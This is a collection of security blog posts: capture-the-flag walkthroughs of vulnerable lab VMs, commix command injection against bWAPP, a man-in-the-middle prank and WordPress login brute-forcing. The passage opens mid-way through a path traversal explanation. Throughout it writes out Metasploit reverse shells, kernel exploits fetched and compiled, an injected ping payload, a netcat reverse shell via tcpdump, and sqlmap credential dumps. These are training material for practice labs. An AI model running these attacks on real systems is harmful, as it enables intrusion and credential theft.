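The unchecked version turns the page's "%2f..%2f..%2fetc/passwd" into /etc/passwd; the checked version returns None for it, for the relative "..%2f..%2f" form, and for the sibling-directory trick, while ordinary script names under the base directory resolve normally.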

The information on this page isn't useful at all. Then I remembered that an HTTP service was open on port 8080 too, so I opened the IP on port 8080.

But access was forbidden. I tried every method to bypass this, but nothing worked other than changing the user agent. So to access this page, go to the Tools menu in the menu bar. A drop-down menu will appear; from it select Default User Agent. Another menu will open; select Internet Explorer, and from the next menu select Internet Explorer 6.

And fortunately we have access to the page, and we find a directory called phptax/

Now open this link and you will see the following page:

The page was phptax. Phptax is a kind of CMS for Linux. Its aim is to develop a tax program which uses a database-less methodology that fits in one-line text files. Using Phptax does not require the SQL databases that are generally used in such programs. And to our luck there is an exploit for Phptax in Metasploit; simply type search phptax in Metasploit.

To use this exploit simply type the following in Metasploit:

use exploit/multi/http/phptax_exec

set rhost 192.168.0.101

set rport 8080

exploit

After this you will directly reach the shell; then type:

id

uname -a

The above commands show the id and the kernel version.

There is an exploit for this version of the kernel on exploit-db.com. Download it and save the file as shown:

Next, type the following command to get the exploit from its default location:

fetch http://192.168.0.104/28818.c

Here we used the fetch command because wget wasn't working, as the security level here was a bit high. So fetch is a substitute for wget, and we are pulling the file directly over HTTP.

Then type the following set of commands to compile and execute the exploit:

ls

gcc -o exploit 28818.c

ls

chmod 777 exploit

./exploit

As the exploit executes you will reach root. To confirm this type:

id

Then, moving forward, go to the root folder by typing:

cd /root

Let's see what it contains; for that type:

ls

Here we have a text file named congrats.txt, and I am hoping this will be our flag. To read it type:

cat congrats.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here.

Hack the Acid VM (CTF Challenge)


The name of the virtual machine we are going to crack is “Acid Server”. It is a Boot2Root VM that we are going to solve. This is a web-based VM. Our main goal is to escalate privileges to root and capture the flag.

You can download it from: https://www.vulnhub.com/entry/acid-server,125/

WalkThrough

As always start by finding the target.

netdiscover

Our target is 192.168.0.105. Now fire up nmap to scan the ports.

nmap -p- -A 192.168.0.105

Nmap shows that there is only one port open, i.e. 33447, running HTTP. Observe that port 80 is not open, which means that if we want to open this IP in the browser we have to specify the port number, as it will not open by default. So now open the web page using the port number.

There is only a heading and a quote on the page, nothing else, but if you look at the tab in the browser it says “/Challenge”. This could be a directory; let's open it.

Upon opening /Challenge, a login portal appears. Let's learn more about /Challenge using DirBuster. Copy the link from the browser into the Target URL box, then select the 2.3-medium wordlist in the “Files with list of dirs/files” box by clicking Browse. Then click Start.

Clicking Start will produce the list of directories.

I went through every directory but only cake.php was useful. Open it in the browser. When you open cake.php, the page says “ah.haan…There is long way to go..dude J”. But upon looking closely you will find that /Magic_Box is written on the tab. Let's open it in the URL just like before.

When you open /Magic_Box it says that access to the page is forbidden. OK! There is no problem with that; let's use DirBuster on it. Give the URL and the 2.3-medium wordlist just as before and then click Start.

The result will show the names of the directories.

Out of all those, command.php is the only one that proved useful. Open it in the URL.

Here you will find a ping portal, which means you can ping any IP address from here. Let's try pinging an IP. (You can ping any IP, but I am going to ping the default IP, i.e. 127.0.0.1.)

Once the IP has been pinged, go to the page source. There you can see the results of the ping being shown.

If the page is showing the result, we can use this portal to inject our payload using the web_delivery exploit. To do so, go to the Kali terminal, open Metasploit by typing msfconsole and then type:

use exploit/multi/script/web_delivery

set target 1

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.104

set lport 4444

exploit

This is a multi-platform module, which means it can be used against several interpreters. Target 1 refers to PHP, and since we are using a PHP payload we have to set the target to 1.

Running this module will give you a one-line command. Copy this command and paste it into the ping portal after the IP that you are pinging, separated by a semicolon (;):

127.0.0.1; *<code>*

As soon as you click Submit, you will have a meterpreter session in Metasploit. Once you have the session, type the following commands to reach a terminal:

shell

python -c 'import pty; pty.spawn("/bin/bash")'

Next, type the following command to list the directories:

ls -l /

In the list you will find a directory called s.bin. Let’s go into the folder and list its files; for that type:

cd /s.bin

ls

Here you will find a PHP file. Let’s read it.

cat invesgitate.php

When you read it, it shows you a message i.e. “now you have to behave like n investigator to catch the culprit”.

The directory listing we viewed earlier also had a folder called sbin. Let’s go into that folder and list its files; to do so, type:

cd sbin

ls

In the list of files you can see a directory named raw_vs_isi. Let’s check it out.

cd raw_vs_isi

ls

It contains only one file, called hint.pcapng. This is a Wireshark capture file, and there are many ways to download it, but they are usually very lengthy, so I used a shortcut. Simply terminate your shell session and go back to the meterpreter session.

There, check where you are currently working; for that type:

pwd

ls

And then type:

download hint.pcapng /root/Desktop/hint.pcapng

Now the file is downloaded to your desktop. I explored every packet and found a conversation in the TCP stream of the 90th packet. Just right-click on that packet, click the Follow option and then select TCP Stream.

It will open the conversation as shown in the image below:

In the conversation one of them says “saman and now a days he’s known by the alias of 1337hax0r”, which means saman is the username and 1337hax0r could be the password. Let’s try it. Type shell again to reach the terminal and log in with the username we just found:

su saman

1337hax0r

sudo su

1337hax0r

And now you are root. Go into the root folder and see what it has to offer:

cd /root

ls

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Acid VM (CTF Challenge) appeared first on Hacking Articles.

Hack the Lord of the Root VM (CTF Challenge)


This is another Boot2Root challenge, prepared by KoocSec as a hacking exercise. He prepared it inspired by his OSCP exam. It is based on the concepts of the great novel-turned-movie The Lord of the Rings.

You can download this VM from: https://www.vulnhub.com/entry/lord-of-the-root-101,129/

WalkThrough

Firstly, we will find our target.

netdiscover

Our target is 192.168.1.5

Now run the nmap script to know the ports and protocols.

nmap -p- -A 192.168.1.5

Nmap shows us that only port 22 is open, running SSH. Port 80 is not open, which means we cannot open this server in a browser. Therefore we will see what port 22 has to offer, so go to your terminal in Kali and type:

ssh 192.168.1.5

When I connected over SSH the banner said “Knock Friend To Enter” and “Easy as 123”, and then it asked for a password that we do not know yet. This is hinting at port knocking. Let’s try it:

nmap -r -Pn -p 1,2,3 192.168.1.5

Here,

-r: scan the ports consecutively, in the given order

-Pn: treat all hosts as online (skip host discovery)

-p: scan only the specified ports

1,2,3: the ports (chosen because of the hint “easy as 1,2,3”)

Now fire up the nmap scan again. This time hopefully we will have more than one port in the result.

nmap -p- -A 192.168.1.5

As you can see there is one more port open compared to our previous scan, 1337, running HTTP, and this is all we wanted since port 80 was not open. Let’s open our target IP with this port.

192.168.1.5:1337

It opens a page with only one image. There was nothing in the page source either. So I used nikto here.

nikto -h 192.168.1.5:1337

None of the directories in nikto’s result was useful. So I tried robots.txt, as I always do by default.

And BOOM! I was right: an image opened here. Then I checked its page source.

In the page source I found a Base64 string, which I decoded using HackBar.

And it gave me the result shown above, but here is a trick: it has to be decoded further, but only from L to =, as that is the Base64-encoded part. Similarly, decode it further.

Upon decoding we have a URL. Let’s open it.

And now we are face to face with a login portal. Here I will try to log in with a random username and password, but during this process we will also capture the cookies via Burp Suite.

As the cookies are captured, we will use them in our next step, sqlmap. I wanted to gather the database to learn the username and password, which is why I decided to use sqlmap. The command I used is:

sqlmap -u http://192.168.1.5:1337/978345210/index.php --forms --batch --crawl=10 --cookie=ibf29bpuc0864gmfobpdsg0pu0 --level=5 --risk=3 --dbs

When you execute this command it will ask you three questions. Answer the first two as no and the third one as yes.

And it will start gathering database.

And finally it will show you the database of usernames and passwords.

Moving on, save all of these usernames and passwords in two different text files, and use these text files in an SSH login brute-force attack. To execute this attack, go to the terminal in Kali, open Metasploit by typing msfconsole, and then type:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.5

set user_file /root/Desktop/user

set pass_file /root/Desktop/pass

exploit

As a result it will show you the correct username and password, smeagol:MyPreciousR00t. Now log in through SSH using this username and password.

ssh smeagol@192.168.1.5

Next, give the password when asked. Once you are logged in, type the following command to find out the distribution release:

lsb_release -a

The version is Ubuntu 14.04, and luckily we have an exploit for this version. In the Kali terminal let’s search for the appropriate exploit; for this type:

searchsploit ubuntu 14.04

The exploit we will use here is 39166.c, and to use it we first need to download and compile it; for this type:

wget http://192.168.1.18/39166.c

gcc 39166.c -o shell

The first command downloads the exploit and the second compiles it and saves it in a file named shell. Next, we have to make the shell executable and then run it.

chmod 777 shell

./shell

Executing the shell file will give you root; to confirm this use the following command:

whoami

Now let’s get into the root folder and see what it has to offer:

cd /root

ls

Here we have found a text file named Flag, which was our ultimate goal. So no more waiting, let’s read it.

cat Flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Lord of the Root VM (CTF Challenge) appeared first on Hacking Articles.

Hack the Breach 2.1 VM (CTF Challenge)


Breach 2.1 is the second VM in the multi-part Breach series of Boot2Root CTF challenges, developed by mrb3n. It is a high-level challenge that covers many scenarios, with plenty of twists and trolls along the way. It works on a static IP, 192.168.110.151, so we have configured our adapter as a host-only adapter.

You can download it from: https://www.vulnhub.com/entry/breach-21,159/

WalkThrough

As our VM is hosted on a static IP, there is no need to discover our target; we will directly start by scanning it.

nmap -p- -A 192.168.110.151

Nmap shows us that only three ports are open: 111, 52263 and 65535, running rpcbind, status and SSH respectively. Let’s check the SSH port.

ssh 192.168.110.151 -p 65535

Here,

-p = the port to connect to

In the area between the hashes the banner says “Peter, if that’s you – the password is in the source”, so I logged in as peter and gave the password “inthesource”:

ssh peter@192.168.110.151 -p 65535

It did not work though. LOL! So I just gave nmap another try, and this time port 80 was open.

As port 80 has just opened, to our luck we can now open this in our browser.

The webpage says “Welcome to Initech Cyber consulting. LLC” and something about BeEF. I found nothing in the page source either, so I decided to use DirBuster. It showed me a lot of directories, but the one that caught my interest was /blog/.

So I opened it in the browser, and it opened a travel blog. There was a search box on the blog, so I tried SQL injection using a single quote (').

This way I found an SQL injection vulnerability, so I used sqlmap next.

sqlmap -u "http://192.168.110.151/blog/index.php?search=" --dbs

This command will start the process and show you five database names.

Out of these five, oscommerce is the most famous e-commerce CMS, and this blog was also related to commerce. So I decided to run my next sqlmap command against this database.

sqlmap -u "http://192.168.110.151/blog/index.php?search=" --dbs -D oscommerce --tables --dump

Executing this command will give you the username and password. The username is admin, but the password you receive will be an MD5 hash.

You can crack this MD5 hash using any third-party tool, or use an online service like I did.

Upon cracking, the password you get here is 32admin. Now I had a username and password but no login portal. So I started exploring the blog but couldn’t find anything, and instead copied its copyright information and pasted it into Google.

Searching Google, the first link was to exploit-db.com, which means there is a public exploit for this software. So I opened the link and explored it.

The exploit described an XSS vector and a link was provided. I know that BeEF does XSS work, and the very first webpage also mentioned BeEF, so naturally I started working with BeEF.

BeEF automatically gives us a hook script which includes a link. I copied that link and opened the BeEF panel in the browser.

Here, go to the Register option and paste the copied link in the username field, and give a random password and email.

As you can see, BeEF will give you a session.

From all the cross-site scripting details BeEF has to show, pay close attention to the browser. You will find that our target is using Firefox 15.0, and fortunately there is an exploit for this in Metasploit.

Now open Metasploit and type the following commands to use the said exploit:

use exploit/multi/browser/firefox_proto_crmfrequest

set payload generic/shell_reverse_tcp

set srvhost 192.168.110.128

set uripath shell

set lhost 192.168.110.128

exploit

Running this exploit will give you a URL; in my case the URL is http://192.168.100.128:4444:8080/shell. Copy this link and go to the BeEF panel. In the BeEF panel go to Commands > Hooked Domain > Redirect Browser and paste the copied link into the Redirect URL text box.

Once you follow the above steps you will have a shell session.

Now here is the trick: you will lose the session as soon as you get it. You have to upgrade the shell session to a meterpreter session within 5 seconds, and for that type:

use post/multi/manage/shell_to_meterpreter

set session 1

run

And you will have a session. Open it and you will reach the terminal. In the terminal let’s check out the home folder.

cd /home

ls

In the home folder you will see three folders: bill, milton and peter. That was not of much use, so I went ahead and checked the network status.

netstat -tln

Checking the network status gave me some coordinates. I looked them up on Google Maps and found that they are the coordinates of Houston. This word, Houston, could be a password or username, so I made a mental note of it for later use.

Apart from this I found nothing, so I used telnet just to get a reply, with the following command:

telnet 127.0.0.1 2323

This time it replied with a question: whose stapler is it? I did not know the answer, so I just pressed Enter. To find the answer I wanted to look at the files owned by the user milton, and the commands for this are:

find /usr -user milton

cat /usr/local/bin/cd.py

The python file shows the program, and as you can see in the image the code shows that the correct answer is “mine”.

So, I repeated my steps to reach the same question. And gave the answer as mine.

Then I checked the network status again and observed that port 8888 had opened.

I checked this port in browser and found two directories.

Out of these I opened oscommerce link and the following page opened.

I had the username and password for this CMS, so I Googled its admin page and logged in with admin as username and admin as password.

Note: we cracked the MD5 hash of the password and got 32admin, but here the 32 is of no use. The password is admin.

It logged in, but to upload the malicious code you have to follow the path File Manager > includes > work. Here you have to upload your PHP code.

To generate the code go to the terminal in Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.110.128 lport=8443 -f raw

Copy everything from <? up to die(); and save it in a .php file.

Before running the file, go to Metasploit and start multi/handler.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.110.128

set lport 8443

exploit

It will give you a meterpreter session; then type the following combination of commands to reach a terminal:

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

id

Next, change into the upload directory:

cd /var/www/html2/oscommerce/includes/work

We still haven’t reached root, but we found the user blumbergh; let’s see what privileges it has.

sudo -l

OK. So it says that it can run tcpdump as root. That’s interesting. To manipulate tcpdump I need to run the following set of commands:

echo $'id\n/bin/netcat 192.168.110.128 443 -e /bin/bash' > /tmp/.test

chmod +x /tmp/.test

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

The tough part is over! Now I just need to run netcat:

nc -nlvp 443

Let’s confirm whether we have reached root, and if yes, let’s see what it has to offer:

id

cd /root

ls

There is a flag.py file in /root. So, no waiting. Let’s capture the flag.

python flag.py

HURRAYYYY!!!! The flag has been captured!!! Enjoy!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the Breach 2.1 VM (CTF Challenge) appeared first on Hacking Articles.

Hack Acid Reloaded VM (CTF Challenge)


Acid Reloaded is the 2nd VM of the Acid series of Boot2Root CTF exercises, created by Avinash Thappa. To capture the flag, first we have to gain root access, which means escalating to administrator privileges.

You can download this VM from: https://www.vulnhub.com/entry/acid-reloaded,127/

WalkThrough

As always, start by finding our target.

netdiscover

This tells us that our target is 192.168.1.10. Now it is time to scan with nmap.

nmap -p- -A 192.168.1.10

The nmap result shows us that only port 22 is open, running SSH. Let’s check out port 22.

ssh 192.168.1.10

Checking out port 22 hints that we should use the port knocking technique.

nmap -r -Pn -p 3,2,1 192.168.1.10

Let’s scan with nmap again.

nmap -p- -A 192.168.1.10

Port knocking helped us open port 33447, on which the HTTP service is running. Now open the target IP in the browser using this port.

A simple webpage opens that tells us to use our brain. Haha! Even the page source did not help. It’s time to use nikto.

nikto -h 192.168.1.10:33447

Nikto reveals that /bin/ might be interesting as it might have a shell system. No harm in checking it out in the browser, so let’s do that.

And it’s a login portal. Now let’s check its page source.

In the page source there is a path: includes/validation.php. I decided to check it out.

Alas! I could not find anything there. So I decided to use DirBuster to find directories. In DirBuster give the URL and use the medium 1.0 wordlist.

Then click the Start button and it will start finding directories.

I checked every directory under bin and only /bin/dashboard.php was useful. When I opened it in the browser I found nothing useful, so I looked into the page source, and even that proved to be of no use.

When nothing helped I decided to capture its request using Burp Suite. To do so, set the proxy, turn on interception and then simply reload the page. When the request is captured, just add the following header below the Host header:

Referer : http://192.168.1.10:33447/bin/includes/validation.php

Now as soon as you hit the Forward button it will automatically log you in.

On the page it says to click and when you do that it will redirect to the following page.

There was nothing on the redirected page or in its page source, so I decided to use sqlmap.

sqlmap -u "192.168.1.10:33447/bin/l33t_haxor.php?id=1" --dbs --tamper=space2comment

It shows us the name of the table: UB3R/strcpy.exe

Now that I had the name of the table, I decided to open it in the URL.

When I opened it in the browser, a dialogue box asked me to save a file, so I did. Then I used the foremost tool to learn a bit about the file.

Foremost is a forensic tool used to recover (carve) files based on their headers and footers.

foremost strcpy.exe

As soon as you run the above command a folder named output is created. Let’s check out this folder.

cd output/

ls

There is a text file in the folder named audit.txt; I decided to read it with the cat command.

cat audit.txt

It lists a .rar file, which I decided to extract with unrar.

unrar x 00000213.rar

On extracting, two files appear: acid.txt and lol.jpg. I decided to read acid.txt.

cat acid.txt

This .txt tells us that we are on the right path. So of course I next looked at lol.jpg.

exiftool lol.jpg

But found nothing. So I extracted it as an archive.

unrar e lol.jpg

Extracting lol.jpg gave me two files again: hint.txt and Avinash.contact. I opened hint.txt, which told me to go with Avinash.contact, so I opened that next.

cat Avinash.contact

The file contained a Base64 string together with some random words like avinash, person, etc. So I saved these random words in a text file and decoded the Base64 string, which turned out to be NooB@123.

Then I brute-forced SSH using the text file I had just created, because one of the words could be the username and another the password. For that open Metasploit and type:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.10

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

exploit

And it gave us makke:NooB@123 as username and password respectively. So I logged in via SSH.

ssh makke@192.168.1.10

Give the password when asked. When I logged in I checked the kernel version and tried to download an exploit for it, but that did not work: all the download options were blocked, so I started exploring.

So I went directly to /bin.

cd /bin

ls

In /bin there was a file called overlayfs. This is a well-known exploit, so I executed it.

./overlayfs

id

ls -la

And then fortunately there was a flag.txt.

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack Acid Reloaded VM (CTF Challenge) appeared first on Hacking Articles.


bWAPP Command Injection Exploitation using Commix (Bypass All Security)


Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection
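The ping portals used in the walkthroughs above (the Acid VM’s command.php and bWAPP’s commandi.php) are instances of exactly this injection. What follows is an added example, not code from bWAPP or from Hacking Articles: a minimal PHP ping handler written the vulnerable way, beside a hardened version that validates the input as an IP address and quotes it before it reaches the shell. The function names are my own.

```php
<?php
// Added example (not bWAPP's or the walkthrough author's code): a ping
// handler the way the vulnerable portals build it, beside a hardened version.

// VULNERABLE: the user-supplied target is concatenated straight into a shell
// command line, so a ';' (or '&&', '|', '`...`', '$(...)') appended to the IP
// makes the shell run a second command with the web server's privileges.
function build_ping_command_vulnerable(string $target): string
{
    return "ping -c 1 " . $target;
}

// HARDENED: accept only a syntactically valid IPv4/IPv6 address, and quote it
// with escapeshellarg() as defence in depth so that shell metacharacters lose
// their meaning even if the validation is ever relaxed. Returns null on reject.
function build_ping_command_hardened(string $target): ?string
{
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return "ping -c 1 " . escapeshellarg($target);
}

// Request handler around the hardened builder. A rejected value is logged
// verbatim (JSON-encoded); a logged target containing ';' or '|' is a useful
// detection signal for whoever reads the web server's error log.
function handle_ping(string $target): string
{
    $cmd = build_ping_command_hardened($target);
    if ($cmd === null) {
        error_log("ping handler: rejected target " . json_encode($target));
        return "invalid target";
    }
    return (string) shell_exec($cmd . " 2>&1");
}

// Constructed demo input in the shape the walkthroughs use ("<ip>; <command>"),
// with a harmless command standing in for the payload. The vulnerable builder
// is only printed, never executed.
$hostile = "127.0.0.1; id";

echo "vulnerable command line: ", build_ping_command_vulnerable($hostile), PHP_EOL;
$safe = build_ping_command_hardened($hostile);
echo "hardened command line:   ", $safe === null ? "(rejected)" : $safe, PHP_EOL;
echo "hardened handler output: ", handle_ping($hostile), PHP_EOL;

// A legitimate address still works through the hardened path.
echo handle_ping("127.0.0.1");
```

bWAPP's medium and high levels are blacklist and escaping variants of the same handler; the hardened form above rejects anything that is not an address instead of trying to strip characters, which is why a tool like commix has nothing left to work with.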

Requirements:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

First you need to set up the bWAPP lab in your XAMPP or WAMP server; for this you can visit my previous article on web pentest lab setup using bWAPP here.

Now I am going to perform an OS command injection attack using bWAPP.

Start the Apache and MySQL services in XAMPP or WAMP. Open the localhost address in the browser; I am using 192.168.1.103:81/bWAPP/login.php. Enter the username and password, bee and bug respectively.

My task is to bypass all three security levels in bWAPP through OS command injection.

Let’s start!

Set security level: low

Look at the image below: I have set the security level to low; from the Choose your bug option select OS Command Injection and click Hack.

Type the IP in the DNS lookup field and then start Burp Suite in Kali Linux. Don’t forget to set the proxy in your browser while using Burp Suite.

To capture the cookie of bWAPP click the Proxy tab, then click the Intercept is on button, come back to bWAPP and now click DNS.

As you can see, I have captured the cookie in Burp Suite.

Open the terminal in Kali Linux and type the commix command.

From the data fetched in Burp Suite copy the referer, cookie and target and use them in the following command:

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0" --data="target=192.168.1.103&form=submit"

This command runs the commix tool in the terminal, which automatically performs the command injection attack using the URL and cookie information from bWAPP.

Type ‘y’ to resume the classic injection point and to get a pseudo-terminal shell.

The attack is successful; commix provides an OS shell.

commix(os_shell) > systeminfo

Set security level: medium

Look at the image below: now I have set the security level to medium; from the Choose your bug option select OS Command Injection and click Hack.

Repeat the process as above: type the IP in the DNS lookup field and then start Burp Suite.

Click Intercept is on, come back to bWAPP and now click DNS. As you can see, I have captured the cookie for the medium level in Burp Suite.

From the data fetched in Burp Suite copy the referer, cookie and target and use them in the following command.

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=1" --data="target=192.168.1.103&form=submit"

Type ‘y’ to resume the classic injection point and to get a pseudo-terminal shell.

The attack is successful at medium security too, and again commix provides an OS shell.

commix(os_shell) > ipconfig

Set security level: high

After achieving an OS shell at low and medium, my next mode is high security; now I am trying to bypass this level by repeating the same process once again.

Set security to high, choose your bug OS Command Injection and click Hack.

Type the IP in the DNS lookup field and then start Burp Suite in Kali Linux. From the data fetched in Burp Suite copy the referer, cookie and target and use them in the following command.

commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=2" --data="target=192.168.1.103&form=submit"

Type ‘y’ to resume the classic injection point and to get a pseudo-terminal shell. We have successfully bypassed the high level as well with the same process.

commix(os_shell) > systeminfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post bWAPP Command Injection Exploitation using Commix (Bypass All Security) appeared first on Hacking Articles.

How to Secure SSH Port using Port Forwarding (Beginner Guide)


In this article I am going to show how to use port forwarding on a system, a process that redirects a communication request from one port to another port or host. It basically allows an outside computer to connect to a computer in a private local area network. Commonly forwarded ports include port 22 for SSH access and port 80 for web servers. The major advantage is that it adds security to your private network and secures communication.

Requirement: Kali Linux

Let’s start!!

Open a terminal and type the following command to install openssh-server on your system.

apt-get install openssh-server

After installing the package we need to start the service on our computer, which starts SSH for communication; then we check whether the service is running or stopped.

service ssh start

service ssh status

Yes, the SSH service is active and you can see its running status with the time and date.

As we know, port 22 is used for SSH, and here the server is listening on port 22.

If I want to check whether port 22 is open or closed I will use nmap to scan the host with the basic command.

SCAN YOUR HOST

 nmap 192.168.0.103

From the result of the nmap scan I found port 22 open with the service ssh.

Port 22 is heavily targeted by DDoS attacks; if an attacker finds port 22 open for SSH they will start attacking the server. For security purposes administrators use port forwarding techniques.

Let me show how to forward a specific port to another port.

PORT FORWARD TECHNIQUE

In Kali Linux, open the file /etc/ssh/sshd_config.

Look at line 3: here the daemon is listening on port 22. Just replace 22 with 1923 and save the file without changing the path. Then restart the service:

service ssh restart

So now the daemon is listening on port 1923 instead of 22. Let me confirm this with an nmap scan.

USE NMAP

nmap -p 1-65535 192.168.0.103

Now if anybody else scans your IP they will have no idea that the SSH service is running on port 1923, because the result shows 1923 open with the service name spice.

The basic nmap scan failed because it does not give the proper result. If you have good knowledge of nmap, use the advanced command.

nmap -p- -A 192.168.0.103

The aggressive scan is successful; this scan probes the port, protocol and service, and as you can see port 1923 is open for the ssh service.

USE TELNET

The same result can be found with telnet when you connect to the host on port 1923.

telnet 192.168.0.103 1923

So if you find any port open, just try to connect with telnet and you will see which service is running on that particular port. Look at the image: the result is very clear that port 1923 is listening for ssh.

USE NETCAT

For the same purpose, using netcat you will be able to find the current service for which 1923 is open.

nc 192.168.0.103 1923

For Windows Users

First download the OpenSSH tool from here and install it on your PC.

This entire task can be performed on a Windows system. To check whether port 22 is open or closed, again use an nmap scan.

nmap 192.168.0.103

From the result of the nmap scan I found port 22 open with the service ssh.

Open the file sshd_config from My Computer > Local Disk (C:) > Program Files > OpenSSH > etc > sshd_config.

Here the daemon is listening on port 22; just replace 22 with 3221 and save the file.

So now the daemon is listening on port 3221 instead of 22.

Now open a command prompt and type the following commands to restart the SSH service on your system.

C:\WINDOWS\SYSTEM32>net stop opensshd

C:\Users\RAJ>net start opensshd

Let me confirm this with an nmap scan.

nmap -A 192.168.0.103

It is clear from the aggressive scan that SSH is running on port 3221 instead of port 22. In this way we can also see through port forwarding.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Secure SSH Port using Port Forwarding (Beginner Guide) appeared first on Hacking Articles.

Play Youtube videos as background sound in Remote PC using Xerosploit


Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow efficient attacks, and also allows carrying out denial-of-service attacks and port scanning. It is powered by bettercap and nmap.

For more detail read the previous article from here.

In this article I am going to use the yplay attack, which plays background sound in the victim’s browser.

Let’s start!!

Requirements: Kali Linux and the xerosploit tool

First you need to download xerosploit from GitHub, or you can visit the link above. I have already downloaded it into my tool folder.

Open a terminal and start the xerosploit tool: ./xerosploit.py

This tool is very easy to use and provides complete information; as you can see I have the details of my network configuration, which will help me select a target in my network. After the tool starts it will ask you to type help to view its attack commands. Go with this and type help.

help

In this grid we have the list of commands for our attack. We are going for a man-in-the-middle attack, so I will choose the scan command in my next step to scan the whole network.

scan

This command scans the complete network and finds the devices on your network.

There are many hosts in this network; you have to choose your target from the given result. I am going to select 192.168.1.19 for the man-in-the-middle attack.

192.168.1.19

In the next prompt it will ask which module you want to load for the man-in-the-middle attack. Go with this and type help.

Look at the list of modules; I will select the yplay module, which plays YouTube videos as background sound on every web page the victim opens in his/her browser. Open your browser and choose your favourite YouTube video that you want to play in the background in the victim’s browser.

If the video has an advertisement, skip it and take the video ID from the URL. Look at the image: I have selected the video ID and copied it. Come back to xerosploit.

yplay

To execute the yplay module for the attack, type run.

run

In the next step, insert the YouTube video ID which you copied from the URL above.

yplay Wd2B8OAotU8

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Play Youtube videos as background sound in Remote PC using Xerosploit appeared first on Hacking Articles.

5 ways to Brute Force Attack on WordPress Website


Brute force attack using Burp Suite

To make Burp Suite work, we first have to turn on a manual proxy in the browser: go to the settings and choose Preferences, then select Advanced, go to Network and select Settings.

Now select Manual proxy configuration, type your localhost address in the HTTP proxy field and set the port to 8080. Click OK.

Now open WordPress on your PC and it will ask you for the username and password. Before giving the username and password, start Burp Suite, select the Proxy tab and turn on interception by clicking the Intercept is on/off button.

Once interception is on, type any password you like so that Burp Suite can capture the request. Look at the image: notice the last line in the fetched data; it shows that I tried to log in with admin:admin as username and password respectively.

Send the captured request to Intruder by right-clicking in the request area and choosing Send to Intruder, or simply press Ctrl+I.

Now open the Intruder tab, select the Positions tab and, without disturbing the data, click the Clear button on the right side of the frame.

Now select the fields as I have selected in the image and click the Add button on the right side of the frame. This configures the positions where payloads will be inserted into the base request.

Select the attack type, which determines the way payloads are assigned to payload positions. I chose cluster bomb, as the number of payload sets depends on the attack type and we have 2 payload positions.

Click on Payload set, which shows the numbers 1 and 2; select number 1 for the first payload position. Then click the Load button under Payload Options and load your simple list of strings to use as payloads, or add the path of a dictionary containing usernames only. Similarly select number 2 for the other payload position and add the path of a dictionary containing passwords only. Click Start attack.

Now the brute-force attack will try every combination of both payloads and attempt to log in with each username and password.

When the attack finishes you can spot the correct credentials by checking the status and length, which will differ from the rest of the combinations.

From the result, user:bitnami is the username and password respectively.

Brute force attack using wpscan

WPScan is a black-box vulnerability scanner for WordPress and is installed by default in Kali Linux. For a WordPress brute force you need a good dictionary, or you can build your own for the attack.

ruby ./wpscan.rb --url 192.168.1.14 --wordlist /root/Desktop/pass.txt --username user

In this attack I fixed the username and supplied a wordlist for the password only. From the result, user:bitnami are the login and password respectively.

Brute force attack using metasploit

This module tests WordPress logins on a range of machines and reports successful logins. If you have loaded a database plugin and connected to a database, the module records the successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4

msf auxiliary(wordpress_login_enum) > set rport 80

msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt

msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt

msf auxiliary(wordpress_login_enum) > exploit

The WordPress brute force succeeded for user:bitnami as username and password.

Brute force attack using OWASP ZAP

ZAP is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. We will now use it for a brute force attack; the process is the same as with Burp Suite.

Start OWASP ZAP and turn on a manual proxy in the browser: go to the settings and choose Preferences, then Advanced, then Network, then Settings. Select Manual proxy configuration, type your localhost address in the HTTP proxy field, set the port to 8080 and click OK.

Now open the WordPress site again; it will ask for a username and password.

